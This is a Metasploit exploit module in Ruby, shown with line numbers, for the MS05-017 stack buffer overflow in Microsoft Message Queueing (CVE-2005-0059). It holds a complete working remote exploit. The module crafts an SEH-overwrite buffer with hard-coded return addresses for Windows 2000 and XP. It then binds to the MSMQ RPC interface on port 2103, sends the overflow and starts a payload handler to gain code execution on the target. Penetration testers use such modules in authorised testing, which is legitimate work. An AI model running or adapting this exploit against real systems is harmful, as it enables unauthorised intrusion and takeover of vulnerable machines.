1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'MS05-017 Microsoft Message Queueing Service Path Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in the RPC interface
19
          to the Microsoft Message Queueing service. The offset to the
20
          return address changes based on the length of the system
21
          hostname, so this must be provided via the 'HNAME' option.
22
          Much thanks to snort.org and Jean-Baptiste Marchand's
23
          excellent MSRPC website.
24
        },
25
        'Author' => [ 'hdm' ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2005-0059'],
29
          [ 'OSVDB', '15458'],
30
          [ 'MSB', 'MS05-017'],
31
          [ 'BID', '13112'],
32
        ],
33
        'Privileged' => true,
34
        'Payload' => {
35
          'Space' => 1024,
36
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
37
          'StackAdjustment' => -3500,
38

39
        },
40
        'Platform' => %w{win},
41
        'Targets' => [
42
          [
43
            'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
44
            {
45
              'Platform' => 'win',
46
              'Rets' => [ 0x004014e9, 0x01001209 ] # mqsvc.exe
47
            },
48
          ],
49
        ],
50
        'DisclosureDate' => '2005-04-12',
51
        'DefaultTarget' => 0,
52
        'Notes' => {
53
          'Reliability' => UNKNOWN_RELIABILITY,
54
          'Stability' => UNKNOWN_STABILITY,
55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
        }
57
      )
58
    )
59

60
    # Change the default port values to point at MSMQ
61
    register_options(
62
      [
63
        Opt::RPORT(2103),
64
        OptString.new('HNAME', [ true, "The NetBIOS hostname of the target" ]),
65
      ]
66
    )
67
  end
68

69
  def autofilter
70
    # Common vulnerability scanning tools report port 445/139
71
    # due to how they test for the vulnerability. Remap this
72
    # back to 2103 for automated exploitation
73

74
    rport = datastore['RPORT'].to_i
75
    if (rport == 445 or rport == 139)
76
      datastore['RPORT'] = 2103
77
    end
78

79
    # The NetBIOS hostname is required to exploit this bug reliably.
80
    if (not datastore['HNAME'])
81
      # XXX automatically determine the hostname
82
      return false
83
    end
84

85
    true
86
  end
87

88
  def exploit
89
    # MSMQ supports three forms of queue names, the two we can use are
90
    # the IP address and the hostname. If we use the IP address via the
91
    # TCP: format, the offset to the SEH frame will change depending on
92
    # the length of the real hostname. For this reason, we force the user
93
    # to supply us with the actual hostname.
94

95
    # Formats: DIRECT=TCP:IPAddress\QueueName DIRECT=OS:ComputerName\QueueName
96

97
    queue_name = "OS:#{datastore['HNAME']}";
98
    queue_hlen = datastore['HNAME'].length * 2
99
    queue_path = unicode(queue_name + "\\PRIVATE$\\")
100

101
    buf = rand_text_english(4000, payload_badchars)
102

103
    # Windows 2000 SEH offset goes first
104
    buf[372 - queue_hlen + 0, 4] = [ target['Rets'][0] ].pack('V')
105
    buf[372 - queue_hlen - 4, 2] = "\xeb\x22"
106

107
    # Windows XP SEH offset goes second
108
    seh = generate_seh_payload(target['Rets'][1])
109
    buf[400 - queue_hlen - 4, seh.length] = seh
110

111
    # Append the path to the location and null terminate it
112
    queue_path << buf << "\x00\x00"
113

114
    # Get the unicode length of this string
115
    queue_plen = queue_path.length / 2
116

117
    connect
118
    print_status("Trying target #{target.name}...")
119

120
    handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
121
    print_status("Binding to #{handle} ...")
122
    dcerpc_bind(handle)
123
    print_status("Bound to #{handle} ...")
124

125
    stubdata =
126
      NDR.long(1) +
127
      NDR.long(1) +
128
      NDR.long(1) +
129
      NDR.long(3) +
130
      NDR.long(3) +
131
      NDR.long(2) +
132
      NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
133

134
    print_status('Sending exploit ...')
135

136
    response = dcerpc.call(9, stubdata)
137

138
    if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
139
      case dcerpc.last_response.stub_data
140
      when "\x20\x00\x0e\xc0"
141
        print_status("The server rejected our request, the HNAME parameter could be incorrect")
142
      when "\x1e\x00\x0e\xc0"
143
        print_status("The server does not appear to be exploitable")
144
      else
145
        print_status("An unknown response was received from the server:")
146
        print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
147
      end
148
    end
149

150
    handler
151
    disconnect
152
  end
153
end
154

155